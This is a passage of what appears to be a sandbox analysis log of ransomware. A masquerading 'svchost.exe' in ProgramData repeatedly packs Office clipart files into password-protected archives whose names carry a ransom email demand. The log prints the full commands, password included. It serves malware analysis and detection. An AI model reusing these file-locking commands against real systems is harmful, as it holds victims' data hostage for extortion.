  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1624
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1188
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2272
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3064
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2660
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2724
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2580
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1188
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2272
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3060
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:736
- C:\ProgramData\msvkp\svchost.exe
